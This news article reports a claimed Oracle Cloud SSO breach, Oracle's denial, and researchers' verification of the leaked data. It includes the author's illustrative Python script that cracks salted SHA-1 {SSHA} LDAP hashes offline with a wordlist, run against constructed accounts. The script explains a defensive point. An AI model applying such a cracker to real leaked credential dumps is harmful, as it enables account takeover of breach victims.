Oracle Hid Serious Data Breach from Customers, Now Hacker Has It Up for Sale
Data breaches have become a harsh reality of the digital age. Companies and organizations announce breaches every month, leaving customers frustrated and exposed. It gets worse still when the company tries to hide the breach: affected customers cannot respond to an exposure they have not been told about, and the company becomes harder to hold accountable.
Earlier this month, a threat actor using the handle Rose87168 claimed to have breached Oracle Cloud's federated SSO login servers, exfiltrating around 6 million records and affecting more than 144,000 Oracle clients. The hacker threatened to sell the data unless affected clients paid to have their records removed from the trove, which reportedly included sensitive material such as single sign-on credentials, LDAP (Lightweight Directory Access Protocol) password hashes, OAuth2 keys, tenant data, and more.
Rose87168 also solicited help from the hacking community to crack the hashed passwords in exchange for some of the data. A day after the threat actor posted a small sample of the data, Oracle told Bleeping Computer there had been no breach of its cloud service. Following Oracle's denial, Rose87168 began leaking further "proof" to the media and to security researchers.
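Putting hashed directory passwords out for crowd-sourced cracking is a realistic threat rather than a bluff, and the following added example shows why. It is my own illustration, not code from the article, from Oracle, or from any of the firms named, and it assumes the RFC 2307 `{SSHA}` scheme (salted SHA-1) that many LDAP directories use; the article does not say which hash format the leaked records actually use, so that scheme is an assumption. The example builds a few constructed `{SSHA}` entries, verifies them the way a directory would, and then runs an offline wordlist attack over them.

```python
import base64
import hashlib
import hmac
import os
from typing import Dict, List, Optional

PREFIX = "{SSHA}"
SHA1_LEN = 20  # SHA-1 digest length in bytes; the salt follows it in the stored value


def ssha_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Encode a password the RFC 2307 {SSHA} way: base64(sha1(pw || salt) || salt)."""
    if salt is None:
        salt = os.urandom(8)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return PREFIX + base64.b64encode(digest + salt).decode("ascii")


def ssha_verify(password: str, stored: str) -> bool:
    """Check a candidate password against a stored {SSHA} value, as a directory server would."""
    if not stored.startswith(PREFIX):
        raise ValueError("unsupported hash scheme: " + stored[:8])
    raw = base64.b64decode(stored[len(PREFIX):])
    digest, salt = raw[:SHA1_LEN], raw[SHA1_LEN:]
    candidate = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(candidate, digest)


def crack_dump(dump: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Offline dictionary attack over a {user: hash} dump; returns {user: password} for every hash that falls.

    The per-entry salt defeats precomputed tables, but it does nothing against this loop:
    SHA-1 is fast and unthrottled offline, so every weak password in the dump is recoverable.
    """
    cracked: Dict[str, str] = {}
    for user, stored in dump.items():
        for guess in wordlist:
            if ssha_verify(guess, stored):
                cracked[user] = guess
                break
    return cracked


# Constructed sample, not leaked data: three accounts with fixed salts so the result is reproducible.
SAMPLE_DUMP = {
    "alice": ssha_hash("Welcome1", salt=b"\x01\x02\x03\x04\x05\x06\x07\x08"),
    "bob": ssha_hash("Summer2024!", salt=b"saltsalt"),
    "carol": ssha_hash("correct horse battery staple 7b3e", salt=b"\xde\xad\xbe\xef\x00\x11\x22\x33"),
}

# Constructed stand-in for a real wordlist.
WORDLIST = ["password", "Welcome1", "Oracle123", "Summer2024!", "letmein"]


if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user}: {pw}")
```

Two of the three constructed accounts fall to a five-word list; only the long passphrase survives. The practical consequence for anyone whose directory appears in such a dump is that the hashes must be treated as plaintext-equivalent for every account with a guessable password, which is why rotation rather than waiting for attribution is the right response.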
Security firm Hudson Rock and researchers at CloudSEK concluded that the data and credentials are legitimate. CloudSEK assessed that the hacker most likely exploited CVE-2021-35587, a critical, publicly known vulnerability in Oracle Access Manager, part of Oracle Fusion Middleware, that lets an unauthenticated remote attacker compromise the server. It is not a zero-day: Oracle released a fix in its January 2022 Critical Patch Update, so the affected login server would have been running unpatched software.
"Pretty crazy Oracle just denied this leak, which has been verified independently by many cybersecurity firms," Hudson Rock CTO Alon Gal posted on LinkedIn on Monday. Trustwave SpiderLabs also reviewed the evidence and concluded that the data was definitely from Oracle Cloud servers.
Trustwave also confirmed that the cache included personally identifiable information such as first and last names, full display names, email addresses, job titles, department numbers, telephone numbers, mobile numbers, and even home contact details. The hacker also uploaded a recording of an internal Oracle meeting. "Such data in a leaked format poses severe cybersecurity and operational risks to the affected organization," Trustwave added.
Security researcher Kevin Beaumont noted that Oracle "rebadged" its legacy Oracle Cloud services as "Oracle Classic." He argues that the careful wording of the company's response is a technically factual but disingenuous denial: Oracle appears to be framing the incident as insignificant, or as one that did not leak current Oracle Cloud records.
For reference, here is Oracle's statement to Bleeping Computer: "There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data."
Beaumont found the repeated use of "Oracle Cloud" suspicious, as if it were setting up Oracle Classic to take the fall. Regardless of the age of the breached servers, however, CloudSEK confirmed with some of its own clients that the leaked data was accurate and current, which undercuts any suggestion that the breach was insignificant or contained only outdated information.
Despite multiple researchers reporting that the breach is serious, Oracle has said nothing further since its denial. Beaumont calls the company's silence irresponsible. Likewise, Gal called Oracle's lack of transparency and guidance "crazy."
In the absence of any advice from Oracle, Gal pointed affected customers to CloudSEK's mitigation recommendations to limit the damage from the leak.